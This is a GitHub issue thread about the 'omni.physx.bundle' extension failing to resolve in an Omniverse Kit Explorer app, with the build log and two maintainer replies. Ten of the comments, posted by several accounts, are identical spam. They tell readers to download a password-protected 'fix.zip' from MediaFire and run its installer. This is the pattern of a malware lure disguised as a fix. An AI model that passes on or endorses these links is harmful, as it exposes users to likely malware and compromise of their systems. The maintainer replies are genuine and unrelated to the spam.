### ISSUE TITLE
[FEATURE]: Missing Extension - omni.physx.bundle

### ISSUE THREAD

**Issue by abhilashca** [NVIDIA-Omniverse/kit-app-template#23]
### Description

Added `omni.physx.bundle` bundle to dependency section of Explorer Kit application.

Actual Result
- got error `Failed to resolve extension dependencies`

Expected Result
- should resolve and automatically load the packages

### System Details

Windows 11/i7 13th Gen/RTX 4050
MSI Stealth 15

### Reproduction Steps

1. Create an Explorer Kit application (`omni.usd_explorer`)
2. add `"omni.physx.bundle" = {}` in `[dependencies]` section in explorer kit template.
3. Build using `.\repo.bat build`

Build fails with error in console.
```
2024-08-26 10:21:41 [5,545ms] [Error] [omni.ext.plugin] Failed to resolve extension dependencies. Failure hints:
        [my_company.industry_digital_twin_explorer-0.1.0] dependency: 'omni.physx.bundle' = {} can't be satisfied. Available versions:
         (none found)
 Synced registries:
         - kit/default         : found 237 packages
         - kit/sdk             : found 318 packages
         - kit/community       : found 362 packages
         - kit/prod/sdk        : found 318 packages

2024-08-26 10:21:41 [5,546ms] [Error] [omni.kit.app.plugin] Failed to generate version file, kit file: my_company.industry_digital_twin_explorer-0.1.0 failed to resolve dependencies.
2024-08-26 10:21:41 [5,548ms] [Error] [omni.kit.app.plugin] Exiting app because of dependency solver failure...
[08/26/24 15:51:41] ERROR    error running: "D:\Omniverse\projects\Industrial Digital Twin\_build\windows-x86_64\release\kit\kit.exe" "D:\Omniverse\projects\Industrial Digital              utils.py:264
                             Twin\source\apps\my_company.industry_digital_twin_explorer.kit" --allow-root --portable --ext-precache-mode --/crashreporter/gatherUserStory=0
                             --/app/settings/persistent=0 --/app/settings/loadUserConfig=0 --/app/extensions/generateVersionLock=1 --/app/extensions/parallelPullEnabled=1
                             --/app/enableStdoutOutput=1 --/app/extensions/detailedSolverExplanation=1 --/app/extensions/registryEnabled=1 --/app/extensions/mkdirExtFolders=0
                             "--/app/extensions/registryCacheFull='D:\Omniverse\projects\Industrial Digital Twin\_build\windows-x86_64\release\extscache'"
                             --/log/flushStandardStreamOutput=1 --/exts/omni.kit.registry.nucleus/registries/0/name=\"kit/default\"
                             --/exts/omni.kit.registry.nucleus/registries/0/url=\"https://ovextensionsprod.blob.core.windows.net/exts/kit/prod/106/shared\"
                             --/exts/omni.kit.registry.nucleus/registries/1/name=\"kit/sdk\"
                             --/exts/omni.kit.registry.nucleus/registries/1/url=\"https://ovextensionsprod.blob.core.windows.net/exts/kit/prod/sdk/${kit_version_short}/${kit_git_hash}\"    
                             --/exts/omni.kit.registry.nucleus/registries/2/name=\"kit/community\"
                             --/exts/omni.kit.registry.nucleus/registries/2/url=\"https://dw290v42wisod.cloudfront.net/exts/kit/community\" --/app/extensions/target/config=release
                             --ext-folder "D:\Omniverse\projects\Industrial Digital Twin\source\extensions" --ext-folder "D:\Omniverse\projects\Industrial Digital Twin\source\apps"
                             --portable-root "D:/Omniverse/projects/Industrial Digital Twin/_build/windows-x86_64/release" --/app/extensions/generateVersionLockSkipLocalExts=1, code: 55,   
                             message: ""
                    ERROR    SystemExit exception stack trace dumped to logfile D:/Omniverse/projects/Industrial Digital Twin/_repo/repo.log. Stacks dumped to console via `--verbose` or      log.py:172
                             `--tracebacks`.
                             SystemExit: 55
SystemExit exception stack trace dumped to logfile D:/Omniverse/projects/Industrial Digital Twin/_repo/repo.log. Stacks dumped to console via `--verbose` or `--tracebacks`.
SystemExit: 55
[08/26/24 15:51:41] ERROR    error running: "D:/Omniverse/projects/Industrial Digital Twin/repo.bat" precache_exts -c release, code: 55, message: ""                                         utils.py:264                    ERROR    SystemExit exception stack trace dumped to logfile D:/Omniverse/projects/Industrial Digital Twin/_repo/repo.log. Stacks dumped to console via `--verbose` or      log.py:172
                             `--tracebacks`.
                             SystemExit: 55
SystemExit exception stack trace dumped to logfile D:/Omniverse/projects/Industrial Digital Twin/_repo/repo.log. Stacks dumped to console via `--verbose` or `--tracebacks`.
SystemExit: 55
```

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SchultzC** [comment]
As of the time of this response, `omni.physx.bundle` is not currently published to the public extension registry.  We are working to include compatible phsyx extensions in the future and will update this issue when that has happened.

**If you would like to see the extensions available on the public registry:**

- Create a new template application (`.\repo.bat template new`) : Select Explorer, Composer, or Base Editor Template
- Build it (`.\repo.bat build)
- And Launch with the developer bundle enabled (`.\repo.bat launch -d`)

This will launch the application with a `Developer` Menu.  The Extensions Manager showing all publicly available extensions can be found `Developer`>` Extensions`


Please file any request for a an extension to be added as a [Feature Request](https://github.com/NVIDIA-Omniverse/kit-app-template/issues/new?assignees=&labels=feature+request&projects=&template=feature_request.yml&title=%5BFEATURE%5D%3A+)

**Comment by SchultzC** [comment]
As of 106.1 omni.physx.bundle is available.  

Adding it to your kit file under dependencies and running `./repo.sh build` should provide you with what you are looking for.

```toml
[dependencies]
"omni.physx.bundle" = {}
```
